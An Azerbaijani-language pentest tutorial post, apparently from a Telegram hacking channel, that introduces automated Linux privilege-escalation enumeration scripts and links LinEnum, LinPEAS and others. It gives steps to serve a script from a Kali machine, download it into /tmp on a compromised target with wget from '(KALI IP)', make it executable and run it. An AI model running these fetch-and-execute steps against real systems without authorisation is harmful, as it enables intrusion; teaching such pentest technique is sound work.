Linux Privilege Escalation nədir? Hansı təhlükəsizlik boşluqları var? Privilege Escalationda hansı məqamlara əsas fikir verilməlidir? LinEnum nədir? LinPrivChecker nədir? LinuxExploitSuggester nədir? LinPEAS nədir? Avtomatlaşdırılmış skrptlərdən istifadə edərək Privilege Escalation
Telegram kanalına qoşularaq bu və digər mövzular üzrə quizlərdə iştirak edə bilərsiniz!
Telegram (Kanal): https://t.me/xakeraz_official
Avtomatlaşdırılmış Skriptlər
İndiki halda biz məhdudiyyətli shell-dən necə root shell əldə edə biləcəyimizi öyrəndik və daha digərlərini öyrənəcəyik.Məhz buna görə paylaşım seriyasından istifadə etdiyimiz kommandaları avtomatlaşdıraraq zəiflik olan hissələri skript köməyi ilə təyin edə bilərik.Əlbəttə Linux sistemi haqqında məlumat çoxdur, avtomatlaşıdırılmış skriptlər isə bizim işimizi yüngülləşdirə və vaxt qazandıra bilər.Əgər Avtomatlaşdırılmış skriptlərdən istifadə edərək hədəf Linux sistemini zəifliyini təyin etmək istəyiriksə, aşağıdakı əməliyyatlar yerinə yetirməliyik.
- Kali cihazımızda veb serveri aktivləşdirək (skript faylını ötürmək üçün)
- Hədəf Linux cihazının shellində aşağıdakıları yerinə yetirin.
- yazma hüququnuz olan qovluğa daxil olun.məsələn /tmp
- wget və ya curl kommandaları ilə yükləyin.
- fayla olan icazələri chmod +x kommandası ilə icra etmək hüququ verin
- skripti işə salın.(məsləhətdirki skript nəticələrini saxlayasınız)
Aşağıda pentest əməliyyatlarınız zamanı istifadə edə biləcəyiniz 4 əsas avtomatlaşdırılmış skript verilmişdir.Verilmiş skriptləri özünüzdə saxlayaraq Linux PrivEsc zamanı birbaşa icra edə bilərsiniz.
- LinEnum: https://github.com/rebootuser/LinEnum
- LinPrivChecker: https://github.com/sleventyeleven/linuxprivchecker
- LinuxExploitSuggester: https://github.com/The-Z-Labs/linux-exploit-suggester
- LinPEAS: https://github.com/peass-ng/PEASS-ng/tree/master/linPEAS
Məsləhət görülən skriptlərdən biri LinEnum-dur.Hədəf Linux əməliyyat sisteminə necə tətbiq edilməli və məcburi edilməli kommandalar aşağıda göstərilmişdir.
- Kali Linux cihazında veb serveri aktivləşdirin. (python3 -m http.server 80)
- Hədəf Linux əməliyat sistemində /tmp qovluğuna daxil olun.
- LinEnum skriptini hədəfə bizim Kali cihazımızdan yükləyək. (wget https://(KALI IP)/LinEnum.sh)
- Fayla icra edilmə icazəsi verək. (chmod +x LinEnum.sh)
- Avtomatlaşdırılmış skripti işə salaq. (./LinEnum.sh)
Ümidvaram faydalı olmuşdur.Təşəkkürlər!
Bizi izləyin:
Telegram (Kanal): https://t.me/xakeraz_official
Paylaşımların səliqəli yığılmış halı: https://t.me/xakerazgroup
Fikir və şərhləriniz : https://t.me/xakerazchat